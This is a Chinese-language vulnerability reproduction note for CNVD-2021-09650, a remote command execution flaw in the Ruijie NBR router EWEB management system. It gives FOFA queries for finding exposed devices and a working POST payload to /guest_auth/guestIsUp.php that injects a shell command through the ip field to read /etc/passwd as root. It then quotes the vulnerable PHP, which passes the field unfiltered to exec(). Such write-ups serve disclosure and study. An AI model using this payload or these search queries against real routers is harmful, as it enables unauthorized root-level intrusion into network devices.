# CNVD-2021-09650 锐捷 NBR 路由器 EWEB 网管系统 远程命令执行

# 漏洞简介

锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等网络设备产品及解决方案的专业化网络厂商。 锐捷网络 EWEB 网管系统存在远程命令执行漏洞。

# 影响版本

锐捷 NBR 路由器 EWEB 网管系统 版本 < 2018 可能

# 资产收集

FOFA:

1
2
3
title="锐捷网络-EWEB网管系统"

icon_hash="-692947551"

# 漏洞复现

image-20210331175521367

post 传输

1
2
3
/guest_auth/guestIsUp.php

mac=1&ip=127.0.0.1|cat /etc/passwd > 566.txt

查看 passwd 写入 566.txt 中

image-20210331175916921

访问 566.txt

image-20210331175953452

这个权限是 root 权限

# 漏洞分析

漏洞的文件在 /guest_auth/guestIsUp.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
//查询用户是否上线了
$userip = @$_POST['ip'];
$usermac = @$_POST['mac'];

if (!$userip || !$usermac) {
exit;
}
/* 判断该用户是否已经放行 */
$cmd = '/sbin/app_auth_hook.elf -f ' . $userip;
$res = exec($cmd, $out, $status);
/* 如果已经上线成功 */
if (strstr($out[0], "status:1")) {
echo 'true';
}
?>

这里没有任何过滤,直接将添加 ip 然后执行 exec,可直接命令拼接注入,从而形成远程命令执行